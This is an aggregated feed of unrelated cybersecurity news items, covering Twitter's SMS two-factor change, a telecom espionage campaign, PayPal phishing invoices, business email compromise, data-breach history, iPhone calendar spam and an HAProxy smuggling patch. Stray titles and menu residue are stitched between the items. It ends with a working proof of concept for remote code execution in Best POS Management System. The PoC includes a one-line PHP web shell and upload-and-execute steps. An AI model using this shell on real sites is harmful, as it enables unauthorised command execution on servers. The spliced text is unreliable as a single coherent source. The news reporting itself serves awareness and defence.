The company will soon require users to pay for a Twitter Blue subscription to get sign-in codes via SMS. Security experts are baffled.

Twitter announced yesterday that as of March 20, it will only allow its users to secure their accounts with SMS-based two-factor authentication if they pay for a Twitter Blue subscription. Two-factor authentication, or 2FA, requires users to log in with a username and password and then an additional “factor” such as a numeric code. Security experts have long advised that people use a generator app to get these codes. But receiving them in SMS text messages is a popular alternative, so removing that option for unpaid users has left security experts scratching their heads.

Twitter's two-factor move is the latest in a series of controversial policy changes since Elon Musk acquired the company last year. The paid service Twitter Blue—the only way to get a blue verified checkmark on Twitter accounts now—costs $11 per month on Android and iOS and less for a desktop-only subscription. Users being booted off of SMS-based two-factor authentication will have the option to switch to an authenticator app or a physical security key.

“While historically a popular form of 2FA, unfortunately, we have seen phone-number-based 2FA be used—and abused—by bad actors,” Twitter wrote in a blog post published Friday evening. “So starting today, we will no longer allow accounts to enroll in the text message/SMS method of 2FA unless they are Twitter Blue subscribers.”

In a July 2022 report about account security, Twitter said that only 2.6 percent of its active users have any type of two-factor authentication enabled. Of those users, nearly 75 percent were using the SMS version. Almost 29 percent were using authenticator apps, and less than 1 percent had added a physical authentication key.

SMS-based two-factor authentication is insecure because attackers can hijack targets' phone numbers or use other techniques to intercept the texts. But security experts have long emphasized that using SMS two-factor is significantly better than having no second authentication factor enabled. 

Increasingly, tech giants like Apple and Google have eliminated the option for SMS two-factor and transitioned users (typically over many months or years) to other forms of authentication. Researchers worry that Twitter's policy change will confuse users by giving them so little time to complete the transition and making SMS two-factor seem like a premium feature.

“The Twitter blog is right to point out that two-factor authentication that uses text messages is frequently abused by bad actors. I agree that it is less secure than other 2FA methods,” says Lorrie Cranor, director of Carnegie Mellon's usable privacy and security lab. “But if their motivation is security, wouldn't they want to keep paid accounts secure too? It doesn't make sense to allow the less secure method for paid accounts only.”  

While the company says its changes to two-factor will roll out in mid-March, Twitter users with SMS two-factor turned on started encountering a pop-up overlay screen on Friday that advised them to remove two-factor entirely or switch to “the authentication app or security key methods.” 

It is unclear what will happen if users do not disable SMS two-factor by the new deadline. The in-app message to users implies that people who still have SMS two-factor turned on when the change officially happens on March 20 will be locked out of their accounts. “To avoid losing access to Twitter, remove text-message two-factor authentication by March 19, 2023,” the notification says. But Twitter's blog post says that two-factor will simply be disabled on March 20 if users don't adjust it before then. “After 20 March 2023, we will no longer permit non–Twitter Blue subscribers to use text messages as a 2FA method,” the company wrote. “At that time, accounts with text message 2FA still enabled will have it disabled.”

Twitter did not return a request for comment about what will happen to accounts that still have SMS two-factor enabled on March 20. The company also did not answer questions about the possibility that the policy change will result in a significant loss of two-factor adoption on the platform.

“On the surface, this sounds like a good degree of concern for users’ safety, but if you pay for Twitter Blue—and are, therefore, a customer who is serious about your Twitter usage and who Twitter should care about the most—you can continue to use that less secure method of authentication. Huh?” says Jim Fenton, an independent identity privacy and security consultant. “And if you aren't a Twitter Blue subscriber, and they downgrade you to just password-based authentication, now they've fully taken something that's purported to improve users’ security and done exactly the opposite.”

On Friday evening, the Twitter account “T(w)itter Takeover News” echoed the company's comments about phone-number-based 2FA being abused by scammers. The account tweeted that “Twitter changed its policies … regarding SMS based 2FA because Telcos Used Bot Accounts to Pump 2FA SMS. They were losing $60mn/yr on scam SMS.” Shortly after, Elon Musk’s Twitter account replied, “Yup.”

Musk has long said that he is in a war against Twitter bots, but he has struggled to deal with separating legitimate bots from malicious ones. Meanwhile, Twitter's SMS two-factor mechanism had outages and reliability problems in mid-November amid chaos inside the company during the early days of Musk's leadership.

Eliminating SMS two-factor “might very incrementally decrease Twitter's costs by not requiring Twitter to pay some telco provider a fraction of a cent to send those SMS messages,” Fenton says. But he adds that the cost savings would likely be extremely minor.

Fenton notes, too, that the move would make more sense if Twitter were also announcing support for the new authentication mechanism known as “passkeys” that tech giants have increasingly been adopting as a way to reduce user reliance on passwords. “Twitter would basically be saying that they’re substituting a new authentication method that also doesn’t require buying a hardware security key,” Fenton says. “But the Twitter Blue exception still wouldn't make sense.”

As the situation plays out, the big question is whether any of it will result in stronger security for Twitter users' accounts. 

“I don't think we really know whether this will nudge people to go ahead and get an authenticator app or whether a lot of people will just give up on 2FA,” Carnegie Mellon's Cranor says. “In general, two-factor authentication is not widely adopted by users unless they are forced to use it. I think a lot of other companies will be watching to see whether disallowing text-message 2FA is a good idea or not.”  

Whether Twitter will be transparent about the impacts of the changes and release updated statistics is another question entirely.

Twitter’s Two-Factor Authentication Change ‘Doesn't Make Sense’

The primary victims so far have been employees of telcos in the Middle East, who were hit with custom backdoors via the cloud, in a likely precursor to a broader attack.

A previously unknown threat actor is targeting telecommunications companies in the Middle East in what appears to be a cyber-espionage campaign similar to many that have hit telecom organizations in multiple countries in recent years.

Researchers from SentinelOne who spotted the new campaign said they're tracking it as WIP26, a designation the company uses for activity it has not been able to attribute to any specific cyberattack group.

In a report this week, they noted that they had observed WIP26 using public cloud infrastructure to deliver malware and store exfiltrated data, as well as for command-and-control (C2) purposes. The security vendor assessed that the threat actor is using the tactic — like many others do these days — to evade detection and make its activity harder to spot on compromised networks. 

"The WIP26 activity is a relevant example of threat actors continuously innovating their TTPs \[tactics, techniques and procedures\] in an attempt to stay stealthy and circumvent defenses," the company said.

**Targeted Mideast Telecom Attacks**

The attacks that SentinelOne observed usually began with WhatsApp messages directed at specific individuals within target telecom companies in the Middle East. The messages contained a link to an archive file in Dropbox that purported to contain documents on poverty-related topics pertinent to the region. But in reality, it also included a malware loader. 

Users tricked into clicking on the link ended up having two backdoors installed on their devices. SentinelOne found one of them, tracked as CMD365, using a Microsoft 365 Mail client as its C2, and the second backdoor, dubbed CMDEmber, using a Google Firebase instance for the same purpose.

The security vendor described WIP26 as using the backdoors to conduct reconnaissance, elevate privileges, deploy addition malware — and to steal the user's private browser data, information on high-value systems on the victim's network, and other data. SentinelOne assessed that a lot of the data that both backdoors have been collecting from victim systems and network suggest the attacker is prepping for a future attack. 

"The initial intrusion vector we observed involved precision targeting," SentinelOne said. "Further, the targeting of telecommunication providers in the Middle East suggests the motive behind this activity is espionage-related."

**Telecom Companies Continue to Be Favorite Espionage Targets**

WIP26 is one of many threat actors that have targeted telecom companies over the past few years. Some of the more recent examples — like a series of attacks on Australian telecom companies such as Optus, Telestra, and Dialog — were financially motivated. Security experts have pointed to those attacks as a sign of increased interest in telecom companies among cybercriminals looking to steal customer data, or to hijack mobile devices via so-called SIM swapping schemes.

More often though, cyberespionage and surveillance have been primary motivations for attacks on telecommunications providers. Security vendors have reported several campaigns where advanced persistent threat groups from countries like China, Turkey, and Iran have broken into a communication provider's network so they could spy on individuals and groups of interest to their respective governments.

One example is Operation Soft Cell, where a China-based group broke into the networks of major telecommunications companies around the world to steal call data records so they could track specific individuals. In another campaign, a threat actor tracked as Light Basin stole Mobile Subscriber Identity (IMSI) and metadata from the networks of 13 major carriers. As part of the campaign, the threat actor installed malware on the carrier networks that that allowed it to intercept calls, text messages, and call records of targeted individuals.

Novel Spy Group Targets Telecoms in 'Precision-Targeted' Cyberattacks

By Deeba Ahmed
Scammers are creating legit PayPal accounts and sending phishing invoices to unsuspected users and since the email comes from service@paypal.com chances of falling for this scam are more than usual.
This is a post from HackRead.com Read the original post: PayPal Scammers Using Legitimate Accounts to Send Phishing Invoices

Protect yourself from PayPal phishing attacks: Learn to spot the signs of a spoofed email and avoid falling for scams that use legitimate PayPal accounts to deceive unsuspecting victims.

PayPal has been one of the most lucrative targets for hackers and spammers which is why customers often complain about phishing scams. Now, the cybersecurity researchers at Avanan have discovered that cybercriminals are once again exploiting PayPal’s online payment system to send malicious invoices directly to users.

In the ongoing campaign, attackers are reportedly abusing PayPal by creating accounts and generating invoices for sending phishing emails. This should not come as a surprise, as just last month, **PayPal notified over 35,000 customers** about a security breach, which goes to show the popularity of PayPal among cyber criminals.

**Email Content Analysis**

The email informs the recipient about fraudulent activity on their account, and if they do not call the listed number, they will be charged a hefty amount, such as $699.99 or more.

It is worth noting that the emails sent in this campaign are not malicious; they are sent directly via PayPal and can pass several checks, such as DMARC, DKIM, and SPF. The problem is that these emails are sent from **service@paypal.com**, so they appear legitimate, and users fail to identify the trap.

The phishing invoice (Credit: Avanan)

Additionally, in a **blog post**, Jeremy Fuchs of Avanan stated that the scam works because of static email Allow Lists, which allow content to go directly into the inbox if it arrives from a reputable service like PayPal.

**Why is PayPal being Targeted?**

The reason PayPal is so easily targeted in this campaign is that the platform allows users to create accounts easily. Therefore, anyone can exploit the free service. Furthermore, threat actors can use PayPal’s tools to create professional-looking malicious invoices. This way, attackers can easily disguise themselves as employers or family members.

**How Can You Detect Malicious Invoices?**

This campaign is different from other attacks leveraging PayPal, as detecting or preventing the attack proved to be very difficult for email security services and users. It happened because the malicious invoices “comes directly from PayPal.”

However, according to Jeremy Fuchs, marketing content manager at Avanan, the email’s content is such that it can raise suspicion. For instance, the content has many grammar and spelling errors.

Moreover, the phone number listed in the email does not belong to PayPal. Fuchs suggests that users should call the phone numbers to find out whether the invoice is legitimate or not.

Here are some additional steps you can take to detect and protect yourself from PayPal phishing emails:

**Google the content of the email before responding**: It is always a good idea to Google the content and email address of the email that you suspect is a phishing one; it is quite possible that someone has already addressed the issue on discussion forums.

**Look for spelling and grammar mistakes:** Phishing emails often contain spelling and grammar mistakes. Be especially wary of emails that contain urgent requests or threats, as scammers often use these tactics to create a sense of urgency and panic.

**Don’t click on any links:** If an email asks you to click on a link to verify your account or update your information, don’t click on it. Instead, go directly to the PayPal website and log in to your account to see if there are any alerts or messages.

**Never enter personal information:** Never enter your personal or financial information in response to an email. PayPal will never ask you to provide sensitive information such as your password, Social Security number, or credit card details via email.

**Use two-factor authentication:** Enable two-factor authentication on your PayPal account to add an extra layer of security. This will require you to enter a code sent to your phone or another device in addition to your password when logging in to your account.

**Report suspicious emails:** If you receive a suspicious email, report it to PayPal immediately. Forward the email to phishing@paypal.com and then delete it from your inbox.

1.  **Phishing link in ransom note steals PayPal data**
2.  **Phishing Links in Text Messages Steal PayPal Account**
3.  **Nasty Android malware stealing its victims’ PayPal funds**
4.  **PayPal’s TIO Networks breach affects millions of customers**
5.  **PayPal & Facebook most targeted brands in phishing scams**

PayPal Scammers Using Legitimate Accounts to Send Phishing Invoices

BEC gangs Midnight Hedgehog and Mandarin Capybara show how online marketing and translation tools are making it easy for these threat groups to scale internationally.

Business email compromise (BEC) attacks involve impersonating an executive or business partner in order to convince a corporate target to wire large sums of cash to an attacker-controlled bank account. Mounting a successful international version of this cyberattack typically requires a lot of effort and resources. Necessary steps include researching the target thoroughly enough to make phishing lures convincing and hiring native speakers to translate scams into multiple languages. But that's all changing as threat groups avail themselves of free, online tools that take some of the legwork out of the process.

A report from Abnormal Security released this week identified two BEC groups that exemplify the trend: Midnight Hedgehog and Mandarin Capybara. Both are leveraging Google Translate, which lets threat actors whip up a plausible phishing lure, in almost any language, in an instant.

Researchers in the report also warned that tools like commercial business marketing services are also making it easier than ever for less-sophisticated and less-resourced BEC threat groups to succeed. These, mostly used by sales and marketing departments to identify "leads," make it simple to track down the best targets regardless of their region. 

It's all bad news for defenders given that BEC attacks are already lucrative, racking up $2.4 billion in losses in 2021 alone, according to the FBI's Crime Report — and the number of BEC attacks continues to explode. Now, with some of the cost being driven out of performing them, volumes are only likely to go up.

**BEC Groups Scale Fast With Translation, Marketing Tools**

Abnormal Security's Crane Hassold, director of threat intelligence who wrote the report, noted that Midnight Hedgehog has been around since January 2021 and impersonates CEOs as its specialty, according to the report.

So far, the firm has observed two distinct phishing emails from the group translated into 11 different languages: Danish, Dutch, Estonian, French, German, Hungarian, Italian, Norwegian, Polish, Spanish, and Swedish. Thanks to Google Translate's effectiveness, the emails are missing the simple errors users are trained to look out for and view as suspicious.

    

Source: devee via Adobe Stock

"We've taught our users to look for spelling mistakes and grammatical errors to better identify when they may have received an attack," the report added. "When these are not present, there are fewer alarm bells to alert native speakers that something isn't right."

Requested payments from Midnight Hedgehog range anywhere from $17,000 to $45,000, the report said.

The second BEC threat group the report highlights, Mandarin Capybara, also sends emails purporting to be from company executives, but uses a twist: It contacts payroll to have direct-deposited paychecks sent to an account they control.

Abnormal Security has observed Mandarin Capybara targeting companies around the globe with phishing lures in Dutch, English, French, German, Italian, Polish, Portuguese, Spanish, and Swedish, but it also targets companies outside of Europe with phishing emails aimed at English speakers in the US and Australia, unlike Midnight Hedgehog, which the report said sticks to non-English-speaking victims in Europe.

**Lowering the Barriers to BEC Entry**

Extending campaigns across any language with translation tools and using online services to identify "leads" of their own on who to victimize with their next cyberattack makes it easier than ever to scale operations across borders for BEC cyberattackers.

"As email marketing and translation tools become more accurate, effective, and accessible, we will continue to see hackers exploiting them to scam companies with increasing success," the report explained. "Not only that, because these emails sound legitimate and rely on behavioral manipulation instead of malware-infected files, Midnight Hedgehog, Mandarin Capybara, and other similar BEC groups will be able to easily bypass legacy security systems and spam filters."

The answer to defending against the rising number and increased sophistication of BEC attacks, Hassold explains to Dark Reading, is a two-pronged approach.

"As social engineering attacks become more sophisticated and it becomes more difficult to distinguish them from legitimate emails, it becomes even more important to prevent them from reaching their destination," he tells Dark Reading. "Security awareness training certainly has a role in defending against phishing attacks, but the best way to prevent employees from falling for these attacks is simply to ensure that they never receive them in the first place."

That means implementing behavioral-based machine learning and AI tools tuned to detect anything outside "normal" behavior will be a key to stopping this new supercharged version of international BEC attacks, the report said.

Google Translate Helps BEC Groups Scam Companies in Any Language

Canteen Management System 1.0 is vulnerable to SQL Injection via /php_action/getOrderReport.php.

HackMD

*   

*   

*   *   Create new note
    *   Create a note from template
*   

*   *   Sharing
    
    *   View mode
        
        *   Edit mode
        *   View mode
        *   Book mode
        *   Slide mode
        
    *   Note Permission
    *   Read
        
        *   Only me
        *   Signed-in users
        *   Everyone
        
    *   Write
        
        *   Only me
        *   Signed-in users
        *   Everyone
        
    *   More (Comment, Invitee)
*   *   Options
    *   Versions and GitHub Sync
    *   Transfer ownership
    *   Delete this note
    *   Template
    *   Save as template
    *   Insert from template
    *   Export
    *   Dropbox
    *   Google Drive
    *   Gist
    *   Import
    *   Dropbox
    *   Google Drive
    *   Gist
    *   Clipboard
    *   Download
    *   Markdown
    *   HTML
    *   Raw HTML

CVE-2023-23279: SQL injection in Canteen Management System v1.0.

Everything you need to know about the past, present, and future of data security—from Equifax to Yahoo—and the problem with Social Security numbers.

The History of Data Breaches

Data breaches have been increasingly common and harmful for decades. A few stand out, though, as instructive examples of how breaches have evolved, how attackers are able to orchestrate these attacks, what can be stolen, and what happens to data once a breach has occurred.

Digital data breaches started long before widespread use of the internet, yet they were similar in many respects to the leaks we see today. One early landmark incident occurred in 1984, when the credit reporting agency TRW Information Systems (now Experian) realized that one of its database files had been breached. The trove was protected by a numeric passcode that someone lifted from an administrative note at a Sears store and posted on an “electronic bulletin board”—a sort of rudimentary Google Doc that people could access and alter using their landline phone connection. From there, anyone who knew how to view the bulletin board could have used the password to access the data stored in the TRW file: personal data and credit histories of 90 million Americans. The password was exposed for a month. At the time, TRW said that it changed the database password as soon as it found out about the situation. Though the incident is dwarfed by last year’s breach of the credit reporting agency Equifax (discussed below), the TRW lapse was a warning to data firms everywhere—one that many clearly didn’t heed.

Large-scale breaches like the TRW incident occurred sporadically as years went by and the internet matured. By the early 2010s, as mobile devices and the Internet of Things greatly expanded interconnectivity, the problem of data breaches became especially urgent. Stealing username/password pairs or credit card numbers—even breaching a trove of data aggregated from already public sources—could give attackers the keys to someone’s entire online life. And certain breaches in particular helped fuel a growing dark web economy of stolen user data.

One of these incidents was a breach of LinkedIn in 2012 that initially seemed to expose 6.5 million passwords. The data was hashed, or cryptographically scrambled, as a protection to make it unintelligible and therefore difficult to reuse, but hackers quickly started “cracking” the hashes to expose LinkedIn users’ actual passwords. Though LinkedIn itself took precautions to reset impacted account passwords, attackers still got plenty of mileage out of them by finding other accounts around the web where users had reused the same password. That all too common lax password hygiene means a single breach can haunt users for years.

The LinkedIn hack also turned out to be even worse than it first appeared. In 2016 a hacker known as “Peace” started selling account information, particularly email addresses and passwords, from 117 million LinkedIn users. Data stolen from the LinkedIn breach has been repurposed and re-sold by criminals ever since, and attackers still have some success exploiting the data to this day, since so many people reuse the same passwords across numerous accounts for years.

Data breaches didn’t truly become dinner table fodder, though, until the end of 2013 and 2014, when major retailers Target, Neiman Marcus, and Home Depot suffered massive breaches one after the other. The Target hack, first publicly disclosed in December 2013, impacted the personal information (like names, addresses, phone numbers, and email addresses) of 70 million Americans and compromised 40 million credit card numbers. Just a few weeks later, in January 2014, Neiman Marcus admitted that its point-of-sale systems had been hit by the same malware that infected Target, exposing the information of about 110 million Neiman Marcus customers, along with 1.1 million credit and debit card numbers. Then, after months of fallout from those two breaches, Home Depot announced in September 2014 that hackers had stolen 56 million credit and debit card numbers from its systems by installing malware on the company’s payment terminals.

An even more devastating and sinister attack was taking place at the same time, though. The Office of Personnel Management is the administrative and HR department for US government employees. The department manages security clearances, conducts background checks, and keeps records on every past and present federal employee. If you want to know what’s going on inside the US government, this is the department to hack. So China did.

Hackers linked to the Chinese government infiltrated OPM’s network twice, first stealing the technical blueprints for the network in 2013, then initiating a second attack shortly thereafter in which they gained control of the administrative server that managed the authentication for all other server logins. In other words, by the time OPM fully realized what had happened and acted to remove the intruders in 2015, the hackers had been able to steal tens of millions of detailed records about every aspect of federal employees’ lives, including 21.5 million Social Security numbers and 5.6 million fingerprint records. In some cases, victims weren’t even federal employees, but were simply connected in some way to government workers who had undergone background checks. (Those checks include all sorts of extremely specific information, like maps of a subject’s family, friends, associates, and children.)

Data Breaches: The Complete WIRED Guide

An issue in HTACG HTML Tidy v5.7.28 allows attacker to execute arbitrary code via the -g option of the CleanNode() function in gdoc.c.

CVE-2021-33391: Heap use-after-free in the CleanNode() function · Issue #946 · htacg/tidy-html5

Categories: Awareness
Categories: News
Categories: Scams
Tags: iPhone

Tags:  calendar

Tags:  spam

Tags:  iOS

Tags:  mobile

Tags:  device

Tags:  ad

Tags:  advert

Tags:  popup

Tags:  permission

Tags:  remove

Tags:  notification

Tags:  Apple

Is your iPhone claiming that you’ve been hacked, your phone isn't protected, or that viruses have damaged it? It could be calendar spam.



(Read more...)




The post iPhone calendar spam: What it is, and how to remove it appeared first on Malwarebytes Labs.

If you open up your iPhone and see a variety of messages claiming that you’ve been hacked, your phone is not protected, that viruses have damaged your phone, or, my personal favourite, “Click to get rid of annoying ads”, fear not. It’s quite possible you’ve accidentally wandered into a common form of scam: Calendar spam.

Calendar spam is a way for scammers to insert nonsensical claims, offers, and warnings with potentially harmful links into your calendar, which triggers notifications on your device.

**How you get it**

The most common techniques for spreading calendar spam are bogus adverts, popups, and other forms of coding used on websites which may be of a questionable nature. They can be found on pornography sites, but also file sharing sites, unofficial streaming platforms, gaming sites, random blogs, pretty much anywhere at all.

Calendar applications like iCal make it easy to add public calendars, which are just URLs, and the scammers exploit that ease of use. The aim of the scammers' game is to get unsuspecting users to accept a calendar subscription. Often, they will obscure the subscription with a distraction. For example, a user may be asked to confirm that they’re a human via CAPTCHA. The user clicks through, and before they realise it, they’ve also clicked “OK” to a follow-up message containing a calendar subscription.

Should you accept one of these subscriptions, the spam calendar and all related events will be added to your calendar app. The events in the calendar contain alerts, which generate notifications, which could leave your screen looking a little something like this. Should you venture into your calendar, a tangled mess of calendar entries awaits.

The links in the calendar entries lead to the usual range of spam, surveys, bogus apps, fake security tools, and more besides. They have nothing you want or need to be wasting your time on. With this in mind, what can you do about it?

**How to remove it**

This is such a problem point for Apple that a dedicated page exists for just this problem. There are two ways to remove calendar spam, and it’s dependent on which iOS version you use. From the help pages:

****iOS 14.6 or later****

*   Open the Calendars app.
*   Tap the unwanted Calendar event.
*   Tap Unsubscribe from this Calendar at the bottom of the screen.
*   To confirm, tap Unsubscribe.

****Earlier versions of iOS****

*   Open the Calendar app.
*   At the bottom of the screen, tap Calendars.
*   Look for a calendar that you don't recognize. Tap the More Info button next to that calendar, then scroll down and tap Delete Calendar.

If this doesn't fix the issue, delete the calendar subscription in Settings:

*   Open the Settings app.
*   Tap Calendar **>** Accounts. Or if you use iOS 13, tap Passwords & Accounts > Accounts instead.
*   Tap Subscribed Calendars.
*   Look for a calendar that you don't recognize. Tap it, then tap Delete Account.

**Not just iPhone**

Spammers will try and abuse all sorts of devices, apps, and systems in order to besiege you with calendar spam (or even calendar-style spam) notification alerts. In 2019, Google Calendar users were hit with a wave of spam notifications, and Calendly users were impacted by phishers abusing the service in 2022. In that same year, new safety features appeared for Google Docs users in order to give users a little more confidence that notifications were not bogus.

No matter the device or service, anything with notification ability could be a target. In many ways, phone calendar spam is a perfect fit for phones where everyday misclicks are very common. It only takes one spam calendar prompt hidden behind something else and a split second lapse in attention for the scammers to stake a claim on your phone.

The good news is that once you understand how the scam works, it’s very easy to remove the notifications and keep your phone free from endless spam notifications.

**Keeping your calendars spam free**

*   **Be careful where you click**. Scammers have to fool you into subscribing to a calendar for this to work, so read before you click! If you do add a calendar prompt, don’t panic. Follow the removal instructions above.
*   **Use Malwarebytes for iOS**. It can block rogue websites and adverts, the two primary causes of unwanted calendar prompts.

Stay safe out there!

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

iPhone calendar spam: What it is, and how to remove it

Exploitation could enable attackers to access backend servers

Exploitation could enable attackers to access backend servers

HAProxy, the popular open source load balancer and reverse proxy, has patched a bug that could enable attackers to stage HTTP request smuggling attacks.

By sending a maliciously crafted HTTP request, an attacker could bypass the filters of HAProxy and gain unauthorized access to back-end servers.

**Dropped headers**

According to a notice by Willy Tarreau, the maintainer of HAProxy, “a properly crafted HTTP request can make HAProxy drop some important headers fields such as Connection, Content-length, Transfer-Encoding, Host, etc after having parsed and at least partially processed them”.

This can confuse HAProxy and force it to send requests to the back-end server without applying filters.

For example, it can be used to bypass HAProxy’s authentication checks for certain URLs or give attackers access to restricted resources. The vulnerability is not hard to exploit, but its impact depends on the target web server and how much it relies on HAProxy filters to secure its resources.

“It just requires moderate knowledge of the HTTP protocol and how a smuggling attack works,” Tarreau told The Daily Swig.

“I know that usual HTTP vuln seekers will immediately understand how to exploit this and will just need two-to-three tests to confirm their hypothesis, which is why it was really not needed to \[include\] more details.”

**Bug present since 2019**

The vulnerability was reported by a group of researchers at Northeastern University, Akamai Technologies, and Google who were running tests.

Tarreau said the vulnerability had existed since version 2.0 of HAProxy, which was released in June 2019.

“Any config supporting HTTP/1 on the client and HTTP/1 on the server is vulnerable unless it runs on the fixed version or it contains the workaround I proposed,” Tarreau said. “So that’s rather close to 100% of exposed deployments.”

Want the latest web security news sent straight to your inbox? Sign up to our newsletter here

Instances deployed deeper in the infrastructure, such as API gateways, are not at risk since no application nor front proxy will produce such invalid requests.

Tarreau is actively maintaining seven versions of HAProxy and has issued fixes for all of them.

“A load balancer is a critical component in an infrastructure, and generally users do not want to upgrade it unless absolutely necessary or if they need new features,” Tarreau said.

“Thus we maintain each stable version for five years so that they have plenty of time to validate a new one and upgrade when needed.”

**Workaround**

For those who are not able to immediately upgrade to the latest version, Tarreau has provided a temporary config-based workaround that blocks attacks by detecting the internal conditions caused by the exploitation of the bug.

And for those who are running older versions of HAProxy, Tarreau’s notice warns: “If you’re running on an outdated version… the best short-term option will be to upgrade to the immediately next branch, which is the one that will give you the least surprise or changes.

“Please do not ask for help upgrading from outdated versions, if you didn’t care about updating in five years, it’s unlikely that anyone will care about helping you to catch up.”

The vulnerability is not the first serious HTTP request smuggling flaw to affect HAProxy, with The Daily Swig reporting on a similar issue afflicting the platform that was disclosed by JFrog researchers in September 2021.

YOU MAY ALSO LIKE OAuth ‘masterclass’ crowned top web hacking technique of 2022

HTTP request smuggling bug patched in HAProxy

Best POS Management System version 1.0 suffers from a remote shell upload vulnerability.

    # Exploit Title: Authenticated Remote Code Execution on File Upload# Google Dork: NA# Date: 17/2/2023# Exploit Author: Ahmed Ismail (@MrOz1l)# Vendor Homepage:https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html# Software Link:https://www.sourcecodester.com/sites/default/files/download/mayuri_k/kruxton.zip# Version: 1.0# Tested on: Windows 11# CVE : NA### Steps to Reproduce1- Login as Admin Rule2- Head to " http://localhost/kruxton/index.php?page=site_settings"3- Try to Upload an image here it will be a shell.php```shell.php``````<?php system($_GET['cmd']); ?>4- Head to http://localhost/kruxton/assets/uploads/5- Access your uploaded Shellhttp://localhost/kruxton/assets/uploads/1676627880_shell.png.php?cmd=whoami

Tag

#google